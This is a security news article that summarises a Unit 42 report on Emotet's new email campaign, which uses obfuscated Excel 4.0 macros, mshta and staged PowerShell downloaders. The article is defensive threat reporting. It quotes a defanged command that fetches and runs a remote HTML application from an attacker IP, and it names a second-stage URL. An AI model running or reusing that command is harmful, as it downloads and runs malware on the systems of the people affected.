Researchers discovered that the infamous Emotet malware has altered methods yet again, this time in an email campaign propagated by infected Excel files. In a report released online on Tuesday, researchers from Palo Alto Networks Unit 42 detected a new infection strategy for the high-volume malware, which is known to alter and change its attack vectors to avoid detection and continue its malicious job.
Emotet was found in 2014 as a banking trojan, and it has been quite active in recent years. The Emotet botnet infrastructure was taken down in January 2021 by law enforcement and judicial agencies, but Emotet resurfaced in November 2021 and has remained active since then. Thread hijacking is a common attack tactic used by Emotet. This method generates bogus responses based on legitimate emails obtained from mail clients of Emotet-infected Windows hosts. This stolen email data is used by the botnet to generate false replies imitating the original senders.
The new attack vector, found on December 21 and still active, sends an Excel file with an obfuscated Excel 4.0 macro via socially engineered emails. These macros are an ancient Excel feature that malicious actors routinely exploit. Before the malicious content can be activated, the victim must enable macros on a vulnerable Windows host.
When the macro code is enabled, cmd.exe is executed to launch mshta.exe with an argument to obtain and run a remote HTML application. In order to avoid static detection methods, the code employs hex and character obfuscation, cmd /c mshta hxxp://91.240.118[.]168/se/s.html is the deobfuscated command string that is executed. The HTML application has been heavily obfuscated. It will download and run additional PowerShell code.
The first PowerShell script is obfuscated and connects to hxxp://91.240.118[.]168/se/s.png. This URL delivers a text-based script for a second-stage set of PowerShell code aimed at retrieving an Emotet binary. This second-stage PowerShell code contains 14 URLs that will be used to retrieve the Emotet binaries.
Each URL is tried until an Emotet binary is successfully downloaded. The use of numerous URLs strengthens this assault in the case that one of the URLs is taken down. As the final stage of this attack chain, the Emotet DLL loads an encrypted PE from its resource area.
“Emotet’s new attack chain reveals multiple stages with different file types and obfuscated script before arriving at the final Emotet payload,” Unit 42 researchers Saqib Khanzada, Tyler Halfpop, Micah Yates and Brad Duncan wrote.
